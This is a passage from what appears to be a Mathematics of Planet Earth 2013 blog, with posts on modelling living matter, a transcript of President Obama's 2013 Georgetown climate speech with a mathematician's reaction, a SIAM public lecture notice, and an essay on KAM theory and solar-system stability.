    • Lack of background field theories. Unlike inert matter, whose mathematical modeling can be often grounded on consolidated physical theories, living matter still lacks a precise treatment in terms of quantitative theories whence to identify the most appropriate mathematical formalizations. If, on the one hand, this is a handicap for the “industrial” production of ready-to-use models, on the other hand it offers mathematics the great opportunity to play a leading role in opening new ways of scientific investigation. Mathematical models can indeed fill the quantitative gap by acting themselves as paradigms for exploring and testing conjectures. They can also put in evidence facts not yet empirically observed, whereby scientists can be motivated to perform new specific experiments aiming at confirming or rejecting such conjectures. Finally, mathematics can also take advantage of these applications for developing new mathematical methods and theories. In fact, nonstandard applications typically generate challenging analytical problems, whereby the role of mathematical research as a preliminary necessary step for mastering new models also at an industrial level is enhanced.

    ANDREA TOSIN
    Istituto per le Applicazioni del Calcolo “M. Picone”
    Consiglio Nazionale delle Ricerche
    Rome, Italy
    E-mail: a.tosin@iac.cnr.it
    URL: http://www.iac.cnr.it/~tosin

    Posted in Mathematics, Social Systems | Leave a comment

    A Day to Celebrate

    Mathematics and Climate Research Network director, Chris Jones, is co-organizing a meeting at InDAM in Rome, Italy this week on “Mathematical Paradigms of Climate Science.” After President Obama’s speech he was asked for comments by the Italian applied mathematics society. His comments are below and here is the Italian press release.

    “This is a day to celebrate that we have a president of the US standing up for the world in which we live and the future generations that will inhabit it. The president showed an extraordinarily accurate understanding of the problem: the science we know and the irrefutable evidence that all point to a seriously changing climate. He explained the risks of inaction and outlined the elements of a plan of action. It has been a long time coming, but heartening that this moment has finally arrived.

    Mathematics has a key role to play in the path ahead. Understanding how the climate will be changing involves extensive experimentation that can only be done on complex mathematical models of the Earth system. We need, as a community, to rise to the challenge of building a framework and tools for the analysis of these models and for the compilation and interpretation of the resulting information.”

    Posted in Climate | Leave a comment

    President Barack Obama’s remarks on climate change at Georgetown University

    Here is the White House transcript of President Barack Obama’s remarks on climate change at Georgetown University Tuesday.
    1:45 P.M. EDT

    THE PRESIDENT: Thank you! (Applause.) Thank you, Georgetown! Thank you so much. Everybody, please be seated. And my first announcement today is that you should all take off your jackets. (Laughter.) I’m going to do the same. (Applause.) It’s not that sexy, now. (Laughter.)

    It is good to be back on campus, and it is a great privilege to speak from the steps of this historic hall that welcomed Presidents going back to George Washington.

    I want to thank your president, President DeGioia, who’s here today. (Applause.) I want to thank him for hosting us. I want to thank the many members of my Cabinet and my administration. I want to thank Leader Pelosi and the members of Congress who are here. We are very grateful for their support.

    And I want to say thank you to the Hoyas in the house for having me back. (Applause.) It was important for me to speak directly to your generation, because the decisions that we make now and in the years ahead will have a profound impact on the world that all of you inherit.

    On Christmas Eve, 1968, the astronauts of Apollo 8 did a live broadcast from lunar orbit. So Frank Borman, Jim Lovell, William Anders — the first humans to orbit the moon -– described what they saw, and they read Scripture from the Book of Genesis to the rest of us back here. And later that night, they took a photo that would change the way we see and think about our world.

    It was an image of Earth -– beautiful; breathtaking; a glowing marble of blue oceans, and green forests, and brown mountains brushed with white clouds, rising over the surface of the moon.

    And while the sight of our planet from space might seem routine today, imagine what it looked like to those of us seeing our home, our planet, for the first time. Imagine what it looked like to children like me. Even the astronauts were amazed. “It makes you realize,” Lovell would say, “just what you have back there on Earth.”

    And around the same time we began exploring space, scientists were studying changes taking place in the Earth’s atmosphere. Now, scientists had known since the 1800s that greenhouse gases like carbon dioxide trap heat, and that burning fossil fuels release those gases into the air. That wasn’t news. But in the late 1950s, the National Weather Service began measuring the levels of carbon dioxide in our atmosphere, with the worry that rising levels might someday disrupt the fragile balance that makes our planet so hospitable. And what they’ve found, year after year, is that the levels of carbon pollution in our atmosphere have increased dramatically.

    That science, accumulated and reviewed over decades, tells us that our planet is changing in ways that will have profound impacts on all of humankind.

    The 12 warmest years in recorded history have all come in the last 15 years. Last year, temperatures in some areas of the ocean reached record highs, and ice in the Arctic shrank to its smallest size on record — faster than most models had predicted it would. These are facts.

    Now, we know that no single weather event is caused solely by climate change. Droughts and fires and floods, they go back to ancient times. But we also know that in a world that’s warmer than it used to be, all weather events are affected by a warming planet. The fact that sea level in New York, in New York Harbor, are now a foot higher than a century ago — that didn’t cause Hurricane Sandy, but it certainly contributed to the destruction that left large parts of our mightiest city dark and underwater.

    The potential impacts go beyond rising sea levels. Here at home, 2012 was the warmest year in our history. Midwest farms were parched by the worst drought since the Dust Bowl, and then drenched by the wettest spring on record. Western wildfires scorched an area larger than the state of Maryland. Just last week, a heat wave in Alaska shot temperatures into the 90s.

    And we know that the costs of these events can be measured in lost lives and lost livelihoods, lost homes, lost businesses, hundreds of billions of dollars in emergency services and disaster relief. In fact, those who are already feeling the effects of climate change don’t have time to deny it — they’re busy dealing with it. Firefighters are braving longer wildfire seasons, and states and federal governments have to figure out how to budget for that. I had to sit on a meeting with the Department of Interior and Agriculture and some of the rest of my team just to figure out how we’re going to pay for more and more expensive fire seasons.

    Farmers see crops wilted one year, washed away the next; and the higher food prices get passed on to you, the American consumer. Mountain communities worry about what smaller snowpacks will mean for tourism — and then, families at the bottom of the mountains wonder what it will mean for their drinking water. Americans across the country are already paying the price of inaction in insurance premiums, state and local taxes, and the costs of rebuilding and disaster relief.

    So the question is not whether we need to act. The overwhelming judgment of science — of chemistry and physics and millions of measurements — has put all that to rest. Ninety-seven percent of scientists, including, by the way, some who originally disputed the data, have now put that to rest. They’ve acknowledged the planet is warming and human activity is contributing to it.

    So the question now is whether we will have the courage to act before it’s too late. And how we answer will have a profound impact on the world that we leave behind not just to you, but to your children and to your grandchildren.

    As a President, as a father, and as an American, I’m here to say we need to act. (Applause.)

    I refuse to condemn your generation and future generations to a planet that’s beyond fixing. And that’s why, today, I’m announcing a new national climate action plan, and I’m here to enlist your generation’s help in keeping the United States of America a leader — a global leader — in the fight against climate change.

    This plan builds on progress that we’ve already made. Last year, I took office — the year that I took office, my administration pledged to reduce America’s greenhouse gas emissions by about 17 percent from their 2005 levels by the end of this decade. And we rolled up our sleeves and we got to work. We doubled the electricity we generated from wind and the sun. We doubled the mileage our cars will get on a gallon of gas by the middle of the next decade. (Applause.)

    Here at Georgetown, I unveiled my strategy for a secure energy future. And thanks to the ingenuity of our businesses, we’re starting to produce much more of our own energy. We’re building the first nuclear power plants in more than three decades — in Georgia and South Carolina. For the first time in 18 years, America is poised to produce more of our own oil than we buy from other nations. And today, we produce more natural gas than anybody else. So we’re producing energy. And these advances have grown our economy, they’ve created new jobs, they can’t be shipped overseas — and, by the way, they’ve also helped drive our carbon pollution to its lowest levels in nearly 20 years. Since 2006, no country on Earth has reduced its total carbon pollution by as much as the United States of America. (Applause.)

    So it’s a good start. But the reason we’re all here in the heat today is because we know we’ve got more to do.

    In my State of the Union address, I urged Congress to come up with a bipartisan, market-based solution to climate change, like the one that Republican and Democratic senators worked on together a few years ago. And I still want to see that happen. I’m willing to work with anyone to make that happen.

    But this is a challenge that does not pause for partisan gridlock. It demands our attention now. And this is my plan to meet it — a plan to cut carbon pollution; a plan to protect our country from the impacts of climate change; and a plan to lead the world in a coordinated assault on a changing climate. (Applause.)

    This plan begins with cutting carbon pollution by changing the way we use energy — using less dirty energy, using more clean energy, wasting less energy throughout our economy.

    Forty-three years ago, Congress passed a law called the Clean Air Act of 1970. (Applause.) It was a good law. The reasoning behind it was simple: New technology can protect our health by protecting the air we breathe from harmful pollution. And that law passed the Senate unanimously. Think about that — it passed the Senate unanimously. It passed the House of Representatives 375 to 1. I don’t know who the one guy was — I haven’t looked that up. (Laughter.) You can barely get that many votes to name a post office these days. (Laughter.)

    It was signed into law by a Republican President. It was later strengthened by another Republican President. This used to be a bipartisan issue.

    Six years ago, the Supreme Court ruled that greenhouse gases are pollutants covered by that same Clean Air Act. (Applause.) And they required the Environmental Protection Agency, the EPA, to determine whether they’re a threat to our health and welfare. In 2009, the EPA determined that they are a threat to both our health and our welfare in many different ways — from dirtier air to more common heat waves — and, therefore, subject to regulation.

    Today, about 40 percent of America’s carbon pollution comes from our power plants. But here’s the thing: Right now, there are no federal limits to the amount of carbon pollution that those plants can pump into our air. None. Zero. We limit the amount of toxic chemicals like mercury and sulfur and arsenic in our air or our water, but power plants can still dump unlimited amounts of carbon pollution into the air for free. That’s not right, that’s not safe, and it needs to stop. (Applause.)

    So today, for the sake of our children, and the health and safety of all Americans, I’m directing the Environmental Protection Agency to put an end to the limitless dumping of carbon pollution from our power plants, and complete new pollution standards for both new and existing power plants. (Applause.)

    I’m also directing the EPA to develop these standards in an open and transparent way, to provide flexibility to different states with different needs, and build on the leadership that many states, and cities, and companies have already shown. In fact, many power companies have already begun modernizing their plants, and creating new jobs in the process. Others have shifted to burning cleaner natural gas instead of dirtier fuel sources.

    Nearly a dozen states have already implemented or are implementing their own market-based programs to reduce carbon pollution. More than 25 have set energy efficiency targets. More than 35 have set renewable energy targets. Over 1,000 mayors have signed agreements to cut carbon pollution. So the idea of setting higher pollution standards for our power plants is not new. It’s just time for Washington to catch up with the rest of the country. And that’s what we intend to do. (Applause.)

    Now, what you’ll hear from the special interests and their allies in Congress is that this will kill jobs and crush the economy, and basically end American free enterprise as we know it. And the reason I know you’ll hear those things is because that’s what they said every time America sets clear rules and better standards for our air and our water and our children’s health. And every time, they’ve been wrong.

    For example, in 1970, when we decided through the Clean Air Act to do something about the smog that was choking our cities — and, by the way, most young people here aren’t old enough to remember what it was like, but when I was going to school in 1979-1980 in Los Angeles, there were days where folks couldn’t go outside. And the sunsets were spectacular because of all the pollution in the air.

    But at the time when we passed the Clean Air Act to try to get rid of some of this smog, some of the same doomsayers were saying new pollution standards will decimate the auto industry. Guess what — it didn’t happen. Our air got cleaner.

    In 1990, when we decided to do something about acid rain, they said our electricity bills would go up, the lights would go off, businesses around the country would suffer — I quote — “a quiet death.” None of it happened, except we cut acid rain dramatically.

    See, the problem with all these tired excuses for inaction is that it suggests a fundamental lack of faith in American business and American ingenuity. (Applause.) These critics seem to think that when we ask our businesses to innovate and reduce pollution and lead, they can’t or they won’t do it. They’ll just kind of give up and quit. But in America, we know that’s not true. Look at our history.

    When we restricted cancer-causing chemicals in plastics and leaded fuel in our cars, it didn’t end the plastics industry or the oil industry. American chemists came up with better substitutes. When we phased out CFCs — the gases that were depleting the ozone layer — it didn’t kill off refrigerators or air-conditioners or deodorant. (Laughter.) American workers and businesses figured out how to do it better without harming the environment as much.

    The fuel standards that we put in place just a few years ago didn’t cripple automakers. The American auto industry retooled, and today, our automakers are selling the best cars in the world at a faster rate than they have in five years — with more hybrid, more plug-in, more fuel-efficient cars for everybody to choose from. (Applause.)

    So the point is, if you look at our history, don’t bet against American industry. Don’t bet against American workers. Don’t tell folks that we have to choose between the health of our children or the health of our economy. (Applause.)

    The old rules may say we can’t protect our environment and promote economic growth at the same time, but in America, we’ve always used new technologies — we’ve used science; we’ve used research and development and discovery to make the old rules obsolete.

    Today, we use more clean energy –- more renewables and natural gas -– which is supporting hundreds of thousands of good jobs. We waste less energy, which saves you money at the pump and in your pocketbooks. And guess what — our economy is 60 percent bigger than it was 20 years ago, while our carbon emissions are roughly back to where they were 20 years ago.

    So, obviously, we can figure this out. It’s not an either/or; it’s a both/and. We’ve got to look after our children; we have to look after our future; and we have to grow the economy and create jobs. We can do all of that as long as we don’t fear the future; instead we seize it. (Applause.)

    And, by the way, don’t take my word for it — recently, more than 500 businesses, including giants like GM and Nike, issued a Climate Declaration, calling action on climate change “one of the great economic opportunities of the 21st century.” Walmart is working to cut its carbon pollution by 20 percent and transition completely to renewable energy. (Applause.) Walmart deserves a cheer for that. (Applause.) But think about it. Would the biggest company, the biggest retailer in America — would they really do that if it weren’t good for business, if it weren’t good for their shareholders?

    A low-carbon, clean energy economy can be an engine of growth for decades to come. And I want America to build that engine. I want America to build that future — right here in the United States of America. That’s our task. (Applause.)

    Now, one thing I want to make sure everybody understands — this does not mean that we’re going to suddenly stop producing fossil fuels. Our economy wouldn’t run very well if it did. And transitioning to a clean energy economy takes time. But when the doomsayers trot out the old warnings that these ambitions will somehow hurt our energy supply, just remind them that America produced more oil than we have in 15 years. What is true is that we can’t just drill our way out of the energy and climate challenge that we face. (Applause.) That’s not possible.

    I put forward in the past an all-of-the-above energy strategy, but our energy strategy must be about more than just producing more oil. And, by the way, it’s certainly got to be about more than just building one pipeline. (Applause.)

    Now, I know there’s been, for example, a lot of controversy surrounding the proposal to build a pipeline, the Keystone pipeline, that would carry oil from Canadian tar sands down to refineries in the Gulf. And the State Department is going through the final stages of evaluating the proposal. That’s how it’s always been done. But I do want to be clear: Allowing the Keystone pipeline to be built requires a finding that doing so would be in our nation’s interest. And our national interest will be served only if this project does not significantly exacerbate the problem of carbon pollution. (Applause.) The net effects of the pipeline’s impact on our climate will be absolutely critical to determining whether this project is allowed to go forward. It’s relevant.

    Now, even as we’re producing more domestic oil, we’re also producing more cleaner-burning natural gas than any other country on Earth. And, again, sometimes there are disputes about natural gas, but let me say this: We should strengthen our position as the top natural gas producer because, in the medium term at least, it not only can provide safe, cheap power, but it can also help reduce our carbon emissions.

    Federally supported technology has helped our businesses drill more effectively and extract more gas. And now, we’ll keep working with the industry to make drilling safer and cleaner, to make sure that we’re not seeing methane emissions, and to put people to work modernizing our natural gas infrastructure so that we can power more homes and businesses with cleaner energy.

    The bottom line is natural gas is creating jobs. It’s lowering many families’ heat and power bills. And it’s the transition fuel that can power our economy with less carbon pollution even as our businesses work to develop and then deploy more of the technology required for the even cleaner energy economy of the future.

    And that brings me to the second way that we’re going to reduce carbon pollution — by using more clean energy. Over the past four years, we’ve doubled the electricity that we generate from zero-carbon wind and solar power. (Applause.) And that means jobs — jobs manufacturing the wind turbines that now generate enough electricity to power nearly 15 million homes; jobs installing the solar panels that now generate more than four times the power at less cost than just a few years ago.

    I know some Republicans in Washington dismiss these jobs, but those who do need to call home — because 75 percent of all wind energy in this country is generated in Republican districts. (Laughter.) And that may explain why last year, Republican governors in Kansas and Oklahoma and Iowa — Iowa, by the way, a state that harnesses almost 25 percent of its electricity from the wind — helped us in the fight to extend tax credits for wind energy manufacturers and producers. (Applause.) Tens of thousands good jobs were on the line, and those jobs were worth the fight.

    And countries like China and Germany are going all in in the race for clean energy. I believe Americans build things better than anybody else. I want America to win that race, but we can’t win it if we’re not in it. (Applause.)

    So the plan I’m announcing today will help us double again our energy from wind and sun. Today, I’m directing the Interior Department to green light enough private, renewable energy capacity on public lands to power more than 6 million homes by 2020. (Applause.)

    The Department of Defense — the biggest energy consumer in America — will install 3 gigawatts of renewable power on its bases, generating about the same amount of electricity each year as you’d get from burning 3 million tons of coal. (Applause.)

    And because billions of your tax dollars continue to still subsidize some of the most profitable corporations in the history of the world, my budget once again calls for Congress to end the tax breaks for big oil companies, and invest in the clean-energy companies that will fuel our future. (Applause.)

    Now, the third way to reduce carbon pollution is to waste less energy — in our cars, our homes, our businesses. The fuel standards we set over the past few years mean that by the middle of the next decade, the cars and trucks we buy will go twice as far on a gallon of gas. That means you’ll have to fill up half as often; we’ll all reduce carbon pollution. And we built on that success by setting the first-ever standards for heavy-duty trucks and buses and vans. And in the coming months, we’ll partner with truck makers to do it again for the next generation of vehicles.

    Meanwhile, the energy we use in our homes and our businesses and our factories, our schools, our hospitals — that’s responsible for about one-third of our greenhouse gases. The good news is simple upgrades don’t just cut that pollution; they put people to work — manufacturing and installing smarter lights and windows and sensors and appliances. And the savings show up in our electricity bills every month — forever. That’s why we’ve set new energy standards for appliances like refrigerators and dishwashers. And today, our businesses are building better ones that will also cut carbon pollution and cut consumers’ electricity bills by hundreds of billions of dollars.

    That means, by the way, that our federal government also has to lead by example. I’m proud that federal agencies have reduced their greenhouse gas emissions by more than 15 percent since I took office. But we can do even better than that. So today, I’m setting a new goal: Your federal government will consume 20 percent of its electricity from renewable sources within the next seven years. We are going to set that goal. (Applause.)

    We’ll also encourage private capital to get off the sidelines and get into these energy-saving investments. And by the end of the next decade, these combined efficiency standards for appliances and federal buildings will reduce carbon pollution by at least three billion tons. That’s an amount equal to what our entire energy sector emits in nearly half a year.

    So I know these standards don’t sound all that sexy, but think of it this way: That’s the equivalent of planting 7.6 billion trees and letting them grow for 10 years — all while doing the dishes. It is a great deal and we need to be doing it. (Applause.)

    So using less dirty energy, transitioning to cleaner sources of energy, wasting less energy through our economy is where we need to go. And this plan will get us there faster. But I want to be honest — this will not get us there overnight. The hard truth is carbon pollution has built up in our atmosphere for decades now. And even if we Americans do our part, the planet will slowly keep warming for some time to come. The seas will slowly keep rising and storms will get more severe, based on the science. It’s like tapping the brakes of a car before you come to a complete stop and then can shift into reverse. It’s going to take time for carbon emissions to stabilize.

    So in the meantime, we’re going to need to get prepared. And that’s why this plan will also protect critical sectors of our economy and prepare the United States for the impacts of climate change that we cannot avoid. States and cities across the country are already taking it upon themselves to get ready. Miami Beach is hardening its water supply against seeping saltwater. We’re partnering with the state of Florida to restore Florida’s natural clean water delivery system — the Everglades.

    The overwhelmingly Republican legislature in Texas voted to spend money on a new water development bank as a long-running drought cost jobs and forced a town to truck in water from the outside.

    New York City is fortifying its 520 miles of coastline as an insurance policy against more frequent and costly storms. And what we’ve learned from Hurricane Sandy and other disasters is that we’ve got to build smarter, more resilient infrastructure that can protect our homes and businesses, and withstand more powerful storms. That means stronger seawalls, natural barriers, hardened power grids, hardened water systems, hardened fuel supplies.

    So the budget I sent Congress includes funding to support communities that build these projects, and this plan directs federal agencies to make sure that any new project funded with taxpayer dollars is built to withstand increased flood risks.

    And we’ll partner with communities seeking help to prepare for droughts and floods, reduce the risk of wildfires, protect the dunes and wetlands that pull double duty as green space and as natural storm barriers. And we’ll also open our climate data and NASA climate imagery to the public, to make sure that cities and states assess risk under different climate scenarios, so that we don’t waste money building structures that don’t withstand the next storm.

    So that’s what my administration will do to support the work already underway across America, not only to cut carbon pollution, but also to protect ourselves from climate change. But as I think everybody here understands, no nation can solve this challenge alone — not even one as powerful as ours. And that’s why the final part of our plan calls on America to lead — lead international efforts to combat a changing climate. (Applause.)

    And make no mistake — the world still looks to America to lead. When I spoke to young people in Turkey a few years ago, the first question I got wasn’t about the challenges that part of the world faces. It was about the climate challenge that we all face, and America’s role in addressing it. And it was a fair question, because as the world’s largest economy and second-largest carbon emitter, as a country with unsurpassed ability to drive innovation and scientific breakthroughs, as the country that people around the world continue to look to in times of crisis, we’ve got a vital role to play. We can’t stand on the sidelines. We’ve got a unique responsibility. And the steps that I’ve outlined today prove that we’re willing to meet that responsibility.

    Though all America’s carbon pollution fell last year, global carbon pollution rose to a record high. That’s a problem. Developing countries are using more and more energy, and tens of millions of people entering a global middle class naturally want to buy cars and air-conditioners of their own, just like us. Can’t blame them for that. And when you have conversations with poor countries, they’ll say, well, you went through these stages of development — why can’t we?

    But what we also have to recognize is these same countries are also more vulnerable to the effects of climate change than we are. They don’t just have as much to lose, they probably have more to lose.

    Developing nations with some of the fastest-rising levels of carbon pollution are going to have to take action to meet this challenge alongside us. They’re watching what we do, but we’ve got to make sure that they’re stepping up to the plate as well. We compete for business with them, but we also share a planet. And we have to all shoulder the responsibility for keeping the planet habitable, or we’re going to suffer the consequences — together.

    So to help more countries transitioning to cleaner sources of energy and to help them do it faster, we’re going to partner with our private sector to apply private sector technological know-how in countries that transition to natural gas. We’ve mobilized billions of dollars in private capital for clean energy projects around the world.

    Today, I’m calling for an end of public financing for new coal plants overseas — (applause) — unless they deploy carbon-capture technologies, or there’s no other viable way for the poorest countries to generate electricity. And I urge other countries to join this effort.

    And I’m directing my administration to launch negotiations toward global free trade in environmental goods and services, including clean energy technology, to help more countries skip past the dirty phase of development and join a global low-carbon economy. They don’t have to repeat all the same mistakes that we made. (Applause.)

    We’ve also intensified our climate cooperation with major emerging economies like India and Brazil, and China — the world’s largest emitter. So, for example, earlier this month, President Xi of China and I reached an important agreement to jointly phase down our production and consumption of dangerous hydrofluorocarbons, and we intend to take more steps together in the months to come. It will make a difference. It’s a significant step in the reduction of carbon emissions. (Applause.)

    And finally, my administration will redouble our efforts to engage our international partners in reaching a new global agreement to reduce carbon pollution through concrete action. (Applause.)

    Four years ago, in Copenhagen, every major country agreed, for the first time, to limit carbon pollution by 2020. Two years ago, we decided to forge a new agreement beyond 2020 that would apply to all countries, not just developed countries.

    What we need is an agreement that’s ambitious — because that’s what the scale of the challenge demands. We need an inclusive agreement -– because every country has to play its part. And we need an agreement that’s flexible — because different nations have different needs. And if we can come together and get this right, we can define a sustainable future for your generation.

    So that’s my plan. (Applause.) The actions I’ve announced today should send a strong signal to the world that America intends to take bold action to reduce carbon pollution. We will continue to lead by the power of our example, because that’s what the United States of America has always done.

    I am convinced this is the fight America can, and will, lead in the 21st century. And I’m convinced this is a fight that America must lead. But it will require all of us to do our part. We’ll need scientists to design new fuels, and we’ll need farmers to grow new fuels. We’ll need engineers to devise new technologies, and we’ll need businesses to make and sell those technologies. We’ll need workers to operate assembly lines that hum with high-tech, zero-carbon components, but we’ll also need builders to hammer into place the foundations for a new clean energy era.

    We’re going to need to give special care to people and communities that are unsettled by this transition — not just here in the United States but around the world. And those of us in positions of responsibility, we’ll need to be less concerned with the judgment of special interests and well-connected donors, and more concerned with the judgment of posterity. (Applause.) Because you and your children, and your children’s children, will have to live with the consequences of our decisions.

    As I said before, climate change has become a partisan issue, but it hasn’t always been. It wasn’t that long ago that Republicans led the way on new and innovative policies to tackle these issues. Richard Nixon opened the EPA. George H.W. Bush declared — first U.S. President to declare — “human activities are changing the atmosphere in unexpected and unprecedented ways.” Someone who never shies away from a challenge, John McCain, introduced a market-based cap-and-trade bill to slow carbon pollution.

    The woman that I’ve chosen to head up the EPA, Gina McCarthy, she’s worked — (applause) — she’s terrific. Gina has worked for the EPA in my administration, but she’s also worked for five Republican governors. She’s got a long track record of working with industry and business leaders to forge common-sense solutions. Unfortunately, she’s being held up in the Senate. She’s been held up for months, forced to jump through hoops no Cabinet nominee should ever have to –- not because she lacks qualifications, but because there are too many in the Republican Party right now who think that the Environmental Protection Agency has no business protecting our environment from carbon pollution. The Senate should confirm her without any further obstruction or delay. (Applause.)

    But more broadly, we’ve got to move beyond partisan politics on this issue. I want to be clear — I am willing to work with anybody –- Republicans, Democrats, independents, libertarians, greens -– anybody — to combat this threat on behalf of our kids. I am open to all sorts of new ideas, maybe better ideas, to make sure that we deal with climate change in a way that promotes jobs and growth.

    Nobody has a monopoly on what is a very hard problem, but I don’t have much patience for anyone who denies that this challenge is real. (Applause.) We don’t have time for a meeting of the Flat Earth Society. (Applause.) Sticking your head in the sand might make you feel safer, but it’s not going to protect you from the coming storm. And ultimately, we will be judged as a people, and as a society, and as a country on where we go from here.

    Our founders believed that those of us in positions of power are elected not just to serve as custodians of the present, but as caretakers of the future. And they charged us to make decisions with an eye on a longer horizon than the arc of our own political careers. That’s what the American people expect. That’s what they deserve.

    And someday, our children, and our children’s children, will look at us in the eye and they’ll ask us, did we do all that we could when we had the chance to deal with this problem and leave them a cleaner, safer, more stable world? And I want to be able to say, yes, we did. Don’t you want that? (Applause.)

    Americans are not a people who look backwards; we’re a people who look forward. We’re not a people who fear what the future holds; we shape it. What we need in this fight are citizens who will stand up, and speak up, and compel us to do what this moment demands.

    Understand this is not just a job for politicians. So I’m going to need all of you to educate your classmates, your colleagues, your parents, your friends. Tell them what’s at stake. Speak up at town halls, church groups, PTA meetings. Push back on misinformation. Speak up for the facts. Broaden the circle of those who are willing to stand up for our future. (Applause.)

    Convince those in power to reduce our carbon pollution. Push your own communities to adopt smarter practices. Invest. Divest. (Applause.) Remind folks there’s no contradiction between a sound environment and strong economic growth. And remind everyone who represents you at every level of government that sheltering future generations against the ravages of climate change is a prerequisite for your vote. Make yourself heard on this issue. (Applause.)

    I understand the politics will be tough. The challenge we must accept will not reward us with a clear moment of victory. There’s no gathering army to defeat. There’s no peace treaty to sign. When President Kennedy said we’d go to the moon within the decade, we knew we’d build a spaceship and we’d meet the goal. Our progress here will be measured differently — in crises averted, in a planet preserved. But can we imagine a more worthy goal? For while we may not live to see the full realization of our ambition, we will have the satisfaction of knowing that the world we leave to our children will be better off for what we did.

    “It makes you realize,” that astronaut said all those years ago, “just what you have back there on Earth.” And that image in the photograph, that bright blue ball rising over the moon’s surface, containing everything we hold dear — the laughter of children, a quiet sunset, all the hopes and dreams of posterity — that’s what’s at stake. That’s what we’re fighting for. And if we remember that, I’m absolutely sure we’ll succeed.

    Thank you. God bless you. God bless the United States of America. (Applause.)

    END 2:32 P.M. EDT

    Posted in Climate Change, Public Event | Leave a comment

    SIAM Annual Meeting – I.E. Block Community Lecture

    MPE2013 features a wealth of public lectures to highlight the year of Mathematics of Planet Earth. There is also a public lecture (the I.E. Block Community Lecture) associated with the SIAM Annual Meeting, and the topic of lecture this year follows an MPE theme. The lecture will be delivered by Anette Hosoi of MIT, with the title From Razor Clams to Robots: The Mathematics Behind Biological Inspired Design. This talk promises to look at natural biological systems for insights into the design and control of unconventional robotic systems. The examples used will be crawling snails, digging clams, and swimming micro-organisms. Mathematics enables the analysis of the physical principles exploited by clams and snails and may provide insights into design of robotic systems. This lecture is intended for a general audience.

    When: Wednesday, July 10, 6:15 p.m.
    Where: San Diego California; Town and Country Resort and Convention Center; Town & Country Room.

    The general public is invited to attend.

    Posted in Biology, Mathematics, Public Event | Leave a comment

    KAM Theory and Celestial Mechanics

    Is the Earth’s orbit stable? Will the Moon always point the same face to our planet? Will some asteroid collide with the Earth? These questions have puzzled mankind since antiquity, and answers have been looked for over the centuries, even if these events might occur on time scales much longer than our lifetime. It is indeed extremely difficult to settle these questions, and despite all efforts, scientists have been unable to give definite answers. But the advent of computers and the development of outstanding mathematical theories now enable us to obtain some results on the stability of the solar system, at least for simple model problems.

    The stability of the solar system is a very difficult mathematical problem, which has been investigated in the past by celebrated mathematicians, including Lagrange, Laplace and Poincaré. Their investigations lead to the development of perturbation theories—theories to find approximate solutions of the equations of motion. However, such theories have an intrinsic difficulty related to the appearance of the so-called small divisors—quantities that can prevent the convergence of the series defining the solution.

    A breakthrough occurred in the middle of the 20th century. At the 1954 International Congress of Mathematics in Amsterdam, the Russian mathematician Andrei N. Kolmogorov (1903-1987) gave the closing lecture, entitled “The general theory of dynamical systems and classical mechanics.” The lecture concerned the stability of specific motions (for the experts: the persistence of quasi-periodic motions under small perturbations of an integrable system). A few years later, Vladimir I. Arnold (1937-2010), using a different approach, generalized Kolmogorov’s results to (Hamiltonian) systems presenting some degeneracies, and in 1962 Jürgen Moser (1928-1999) covered the case of finitely differentiable systems. The overall result is known as KAM theory from the initials of the three authors [K], [A], [M]. KAM theory can be developed under quite general assumptions.

    An application to the N-body problem in Celestial Mechanics was given by Arnold, who proved the existence of some stable solutions when the orbits are nearly circular and coplanar. Quantitative estimates for a three-body model (e.g., the Sun, Jupiter and an asteroid) were given in 1966 by the French mathematician and astronomer M. Hénon (1931-2013), based on the original versions of KAM theory [H]. However, his results were a long way from reality; in the best case they proved the stability of some orbits when the primary mass-ratio is of the order of $10^{-48}$—a value that is inconsistent with the astronomical Jupiter-Sun mass-ratio, which is of the order of $10^{-3}$. For this reason Hénon concluded in one of his papers, “Ainsi, ces théorèmes, bien que d’un très grand intérêt théorique, ne semblent pas pouvoir en leur état actuel être appliqués á des problèmes pratiques” [H]. This result led to the general belief that, although an extremely powerful mathematical method, KAM theory does not have concrete applications, since the perturbing body must be unrealistically small. During one of my stays at the Observatory of Nice in France, I had the privilege to meet Michel Hénon. In the course of one of our discussions he showed me his computations on KAM theory, which were done by hand on only two pages. It was indeed a success that such a complicated theory could be applied using just two pages! Likewise, it was evident that to get better results it is necessary to perform much longer computations, as often happens in classical perturbation theory.

    A new challenge came when mathematicians started to develop computer-assisted proofs. With this technique, which has been widely used in several fields of mathematics, one proves mathematical theorems with the aid of a computer. Indeed, it is possible to keep track of rounding and propagation errors through a technique called interval arithmetic. The synergy between theory and computers turns out to be really effective: the machine enables us to perform a huge number of computations, and the errors are controlled through interval arithmetic. Thus, the validity of the mathematical proof is maintained. The idea was then to combine KAM theory and interval arithmetic. As we will see shortly, the new strategy yields results for simple model problems that agree with the physical measurements. Thus, computer-assisted proofs combine the rigour of the mathematical computations with the concreteness of astronomical observations.
    Here are three applications of KAM theory in Celestial Mechanics which yield realistic estimates. The extension to more significant models is often limited by the computer capabilities.

    • A three-body problem for the Sun, Jupiter and the asteroid Victoria was investigated in [CC]. Careful analytical estimates were combined with a Fortran code implementing long computations using interval arithmetic. The results show that in such a model the motion of the asteroid Victoria is stable for the realistic Jupiter-Sun mass-ratio.
    • In the framework of planetary problems, the Sun-Jupiter-Saturn system was studied in [LG]. A bound was obtained on the secular motion of the planets for the observed values of the parameters. (The proof is based on the algebraic manipulation of series, analytic estimates and interval arithmetic.)
    • A third application concerns the rotational motion of the Moon in the so-called spin-orbit resonance, which is responsible for the well-known fact that the Moon always points the same face to the Earth. Here, a computer-assisted KAM proof yielded the stability of the Moon in the actual state for the true values of the parameters [C].

    Although it is clear that these models provide an (often crude) approximation of reality, they were analyzed through a rigorous method to establish the stability of objects in the solar system. The incredible effort by Kolmogorov, Arnold and Moser is starting to yield new results for concrete applications. Faster computational tools, combined with refined KAM estimates, will probably enable us to obtain good results also for more realistic models. Proving a theorem for the stability of the Earth or the motion of the Moon will definitely let us sleep more soundly!

    References:

    [A] V.I. Arnold, “Proof of a Theorem by A.N. Kolmogorov on the invariance of quasi–periodic motions under small perturbations of the Hamiltonian,” Russ. Math. Surveys, vol. 18, 13-40 (1963).
    [C] A. Celletti, “Analysis of Resonances in the Spin-Orbit Problem in Celestial Mechanics, PhD thesis, ETH-Zürich (1989); see also “Analysis of resonances in the spin-orbit problem in Celestial Mechanics: the synchronous resonance (Part I),” Journal of Applied Mathematics and Physics (ZAMP), vol. 41, p.174-204 (1990).
    [CC] A. Celletti and L. Chierchia, “KAM Stability and Celestial Mechanics,” Memoirs American Mathematical Society, vol. 187, no. 878 (2007).
